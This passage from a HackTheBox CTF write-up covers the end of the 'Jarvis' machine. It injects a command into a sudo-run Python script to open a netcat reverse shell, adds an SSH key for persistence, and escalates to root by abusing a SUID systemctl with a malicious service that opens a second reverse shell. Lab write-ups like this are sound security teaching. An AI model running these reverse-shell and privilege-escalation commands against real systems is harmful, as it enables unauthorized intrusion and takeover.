<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br></pre></td><td class="code"><pre><span class="line">[hg8@archbook ~]$ nc -l -vv -p 8544</span><br><span class="line">Listening on any address 8544</span><br><span class="line"></span><br><span class="line">$ <span class="built_in">echo</span> <span class="string">"nc -e /bin/sh 10.10.10.10 8544"</span> &gt; /tmp/hg8.sh</span><br><span class="line">$ sudo -u pepper /var/www/Admin-Utilities/simpler.py -p</span><br><span class="line">***********************************************</span><br><span class="line">     _                 _</span><br><span class="line"> ___(_)_ __ ___  _ __ | | ___ _ __ _ __  _   _</span><br><span class="line">/ __| | <span class="string">'_ ` _ \| '</span>_ \| |/ _ \ <span class="string">'__| '</span>_ \| | | |</span><br><span class="line">\__ \ | | | | | | |_) | |  __/ |_ | |_) | |_| |</span><br><span class="line">|___/_|_| |_| |_| .__/|_|\___|_(_)| .__/ \__, |</span><br><span class="line">                |_|               |_|    |___/</span><br><span class="line">                                @ironhackers.es</span><br><span class="line"></span><br><span class="line">***********************************************</span><br><span class="line"></span><br><span class="line">Enter an IP: $(bash /tmp/hg8.sh)</span><br></pre></td></tr></table></figure>

<p>And surely enough we get our shell!</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line">[hg8@archbook ~]$ nc -l -vv -p 8544</span><br><span class="line">Listening on any address 8544</span><br><span class="line">Connection from 10.10.10.143:57986</span><br><span class="line">pepper@jarvis:~$ id</span><br><span class="line">uid=1000(pepper) gid=1000(pepper) groups=1000(pepper)</span><br><span class="line">pepper@jarvis:~$ cat user.txt</span><br><span class="line">2afxxxxxxxxxxxxxxc44f</span><br></pre></td></tr></table></figure>

<h2 id="Root-Flag"><a href="#Root-Flag" class="headerlink" title="Root Flag"></a>Root Flag</h2><h3 id="Recon-1"><a href="#Recon-1" class="headerlink" title="Recon"></a>Recon</h3><p><em>Note: To make it easier I added my ssh pub key to <code>authorized_keys</code> to connect to the <code>pepper</code> account by SSH:</em></p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="built_in">echo</span> <span class="string">"ssh-rsa XXXXX"</span> &gt;&gt; ~/.ssh/authorized_keys</span><br></pre></td></tr></table></figure>

<p>The recon phase will be quick here since we already a very valuable information in the user recon phase : <code>/bin/systemctl</code> have the SUID bit set :</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">$ ls -l /bin/systemctl</span><br><span class="line">-rwsr-x--- 1 root pepper 174520 Feb 17  2019 /bin/systemctl</span><br></pre></td></tr></table></figure>

<p>This mean that if we manage to make <code>systemctl</code> run a command for us, this one will be automatically run as root user.</p>
<h3 id="Systemctl-privilege-escalation"><a href="#Systemctl-privilege-escalation" class="headerlink" title="Systemctl privilege escalation"></a>Systemctl privilege escalation</h3><p>For this kind of need, <a href="https://gtfobins.github.io/" target="_blank" rel="noopener">GTFOBins</a> is an incredibly useful project:</p>
<blockquote>
<p>GTFOBins is a curated list of Unix binaries that can be exploited by an attacker to bypass local security restrictions.</p>
<p>The project collects legitimate functions of Unix binaries that can be abused to break out restricted shells, escalate or maintain elevated privileges, transfer files, spawn bind and reverse shells, and facilitate the other post-exploitation tasks.</p>
</blockquote>
<p>And surely enough, there is informations and even an example for <code>systemctl</code> :</p>
<blockquote>
<p>It runs with the SUID bit set and may be exploited to access the file system, escalate or maintain access with elevated privileges working as a SUID backdoor. If it is used to run sh -p, omit the -p argument on systems like Debian (&lt;= Stretch) that allow the default sh shell to run with SUID privileges.</p>
</blockquote>
<p>First we open our listener:</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">[hg8@archbook ~]$ nc -l -vv -p 8585</span><br><span class="line">Listening on any address 8585</span><br></pre></td></tr></table></figure>

<p>Now let’s run the GTFO example and replace the command with our reverse shell :</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line">[hg8@archbook ~]$ TF=$(mktemp).service</span><br><span class="line">[hg8@archbook ~]$ <span class="built_in">echo</span> <span class="string">'[Service]</span></span><br><span class="line"><span class="string">Type=oneshot</span></span><br><span class="line"><span class="string">ExecStart=/bin/sh -c "nc 10.10.10.10 8585 -e /bin/bash"</span></span><br><span class="line"><span class="string">[Install]</span></span><br><span class="line"><span class="string">WantedBy=multi-user.target'</span> &gt; <span class="variable">$TF</span></span><br><span class="line">[hg8@archbook ~]$ systemctl link <span class="variable">$TF</span></span><br><span class="line">[hg8@archbook ~]$ systemctl <span class="built_in">enable</span> --now <span class="variable">$TF</span></span><br></pre></td></tr></table></figure>

<p>And since everything went fine, we get our shell:</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line">[hg8@archbook ~]$ nc -l -vv -p 8585</span><br><span class="line">Listening on any address 8585</span><br><span class="line">Connection from 10.10.10.143:35734</span><br><span class="line"></span><br><span class="line">root@jarvis:/<span class="comment">#</span></span><br><span class="line">root@jarvis:/<span class="comment"># cat /root/root.txt</span></span><br><span class="line">d41dxxxxxxxxxxxxxxx71</span><br></pre></td></tr></table></figure>

<p>Hope this was clear enough, as always do not hesitate to contact me for any questions or feedbacks.</p>
<p>See you next time !</p>
<p>-hg8</p>

  </div>
</article>
<br>
<br>


    <div class="article-category">
        <i class="fas fa-archive"></i>
        <a class="category-link" href="/categories/CTF/">CTF</a> › <a class="category-link" href="/categories/CTF/HackTheBox/">HackTheBox</a> › <a class="category-link" href="/categories/CTF/HackTheBox/Medium-Box/">Medium Box</a>
    </div>



    <div class="article-tag">
        <i class="fas fa-tag"></i>
        <a class="tag-link" href="/tags/command-injection/" rel="tag">command-injection</a>, <a class="tag-link" href="/tags/cve-2018-12613/" rel="tag">cve-2018-12613</a>, <a class="tag-link" href="/tags/gobuster/" rel="tag">gobuster</a>, <a class="tag-link" href="/tags/gtfobins/" rel="tag">gtfobins</a>, <a class="tag-link" href="/tags/jarvis/" rel="tag">jarvis</a>, <a class="tag-link" href="/tags/phpmyadmin/" rel="tag">phpmyadmin</a>, <a class="tag-link" href="/tags/python/" rel="tag">python</a>, <a class="tag-link" href="/tags/service/" rel="tag">service</a>, <a class="tag-link" href="/tags/sql-injection/" rel="tag">sql-injection</a>, <a class="tag-link" href="/tags/sqlmap/" rel="tag">sqlmap</a>, <a class="tag-link" href="/tags/systemctl/" rel="tag">systemctl</a>, <a class="tag-link" href="/tags/waf/" rel="tag">waf</a>
    </div>





        
          <div id="footer-post-container">
  <div id="footer-post">

    <div id="nav-footer" style="display: none">
      <ul>
         
          <li><a href="/">Home</a></li>
         
          <li><a href="/about/">About</a></li>
         
          <li><a href="/archives/">Posts</a></li>
         
          <li><a href="/search/">Search</a></li>
        
      </ul>
    </div>

    <div id="toc-footer" style="display: none">
      <ol class="toc"><li class="toc-item toc-level-2"><a class="toc-link" href="#User-Flag"><span class="toc-number">1.</span> <span class="toc-text">User Flag</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#Recon"><span class="toc-number">1.1.</span> <span class="toc-text">Recon</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#SQL-Injection"><span class="toc-number">1.2.</span> <span class="toc-text">SQL Injection</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#Pivot-www-data-gt-pepper"><span class="toc-number">1.3.</span> <span class="toc-text">Pivot www-data -&gt; pepper</span></a></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#Root-Flag"><span class="toc-number">2.</span> <span class="toc-text">Root Flag</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#Recon-1"><span class="toc-number">2.1.</span> <span class="toc-text">Recon</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#Systemctl-privilege-escalation"><span class="toc-number">2.2.</span> <span class="toc-text">Systemctl privilege escalation</span></a></li></ol></li></ol>
    </div>

    <div id="actions-footer">
        <a id="menu" class="icon" href="#" onclick="$('#nav-footer').toggle();return false;"><i class="fas fa-bars fa-lg" aria-hidden="true"></i> Menu</a>
        <a id="toc" class="icon" href="#" onclick="$('#toc-footer').toggle();return false;"><i class="fas fa-list fa-lg" aria-hidden="true"></i> TOC</a>
        <a id="top" style="display:none" class="icon" href="#" onclick="$('html, body').animate({ scrollTop: 0 }, 'fast');"><i class="fas fa-chevron-up fa-lg" aria-hidden="true"></i> Top</a>
    </div>

  </div>
</div>

        
        <footer id="footer">
  <div class="footer-left">
    Copyright &copy;
    
    
    2020
    <a href="https://hg8.sh">hg8.sh</a>
  </div>
  <div class="footer-right">
    <nav>
      <ul>
         
          <li><a href="/">Home</a></li>
         
          <li><a href="/archives/">Archives</a></li>
         
          <li><a href="/categories/">Category</a></li>
         
          <li><a href="/tags/">Tags</a></li>
         
          <li><a href="/atom.xml">RSS</a></li>
        
      </ul>
    </nav>
  </div>
</footer>

    </div>
    <!-- styles -->

<link rel="stylesheet" href="/lib/font-awesome/css/all.min.css">


    <!-- jquery -->

<script src="/lib/jquery/jquery.min.js"></script>


<script src="/js/main.js"></script>

<!-- search -->

<!-- Disqus Comments -->


</body>
</html>
